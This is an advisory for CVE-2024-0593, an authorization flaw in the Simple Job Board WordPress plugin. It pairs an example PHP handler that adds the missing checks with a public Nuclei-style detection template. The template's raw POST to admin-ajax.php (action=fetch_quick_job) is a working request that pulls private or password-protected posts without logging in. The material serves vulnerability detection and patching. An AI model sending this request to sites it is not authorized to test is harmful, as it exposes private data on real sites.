The Simple Job Board plugin for WordPress is vulnerable to unauthorized data access due to insufficient authorization checking in the fetch_quick_job() function in all versions up to and including 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information.
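The missing check described above belongs in the AJAX handler itself. As an added example (not the plugin's code and not the vendor's patch), here is a handler for the same action that returns only published job posts without a password to anonymous callers; the function names, the `jobpost` post type slug and the JSON response shape are assumptions.

```php
<?php
// Added example: hypothetical handler, not Simple Job Board's own code.
// EXAMPLE_JOB_POST_TYPE is an assumed post type slug for job listings.
const EXAMPLE_JOB_POST_TYPE = 'jobpost';

// Assumption: the action is reachable both logged-in and logged-out.
add_action( 'wp_ajax_fetch_quick_job', 'example_fetch_quick_job' );
add_action( 'wp_ajax_nopriv_fetch_quick_job', 'example_fetch_quick_job' );

function example_fetch_quick_job() {
    // absint() reduces whatever the client sent to a non-negative integer.
    $job_id = isset( $_POST['job_id'] ) ? absint( $_POST['job_id'] ) : 0;
    $post   = $job_id ? get_post( $job_id ) : null;

    // One generic error for every refusal, so the response does not reveal
    // whether a private or protected post exists at that ID.
    if ( ! $post || ! example_can_view_job( $post ) ) {
        wp_send_json_error( array( 'message' => 'Job not found.' ), 404 );
    }

    wp_send_json_success(
        array(
            'title'   => get_the_title( $post ),
            'content' => apply_filters( 'the_content', $post->post_content ),
        )
    );
}

function example_can_view_job( WP_Post $post ) {
    // 1. Serve only the post type this endpoint exists for.
    if ( EXAMPLE_JOB_POST_TYPE !== $post->post_type ) {
        return false;
    }
    // 2. Password-protected content is never returned from this endpoint.
    if ( '' !== $post->post_password ) {
        return false;
    }
    // 3. Published posts are public; private, draft or pending posts
    //    require a user who may read that specific post.
    if ( 'publish' === $post->post_status ) {
        return true;
    }
    return current_user_can( 'read_post', $post->ID );
}
```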
PoC code [public]
id: CVE-2024-0593
info:
  name: WordPress Simple Job Board - Unauthorized Data Access
  author: zer0p0int
  severity: medium
  description: |
    The Simple Job Board plugin for WordPress is vulnerable to unauthorized data access due to insufficient authorization checking in the fetch_quick_job() function in all versions up to and including 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0
    - https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0593
    epss-score: 0.11927
    epss-percentile: 0.9346
    cwe-id: CWE-862
    cpe: cpe:2.3:a:awsm:simple_job_board:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: awsm
    product: simple_job_board
    fofa-query: body="/wp-content/plugins/simple-job-board"
  tags: cve,cve2024,wp,wordpress,wp-plugin,simple-job-board,exposure,vuln
http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=fetch_quick_job&job_id=1
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Apply Online"
          - "Submit</button>"
          - "Attach Resume"
          - "Start Company"
        condition: and
      - type: status
        status:
          - 200
# digest: 4a0a00473045022014f524802caf5519f0649599e0298db5b8d5de8df12b5d52d7599e8660bfa0ca022100a9782599e0082e470aefd9fa89cf962bb047d90183e473b434ec168181809bc0:922c64590222798bb761d5b6d8e72950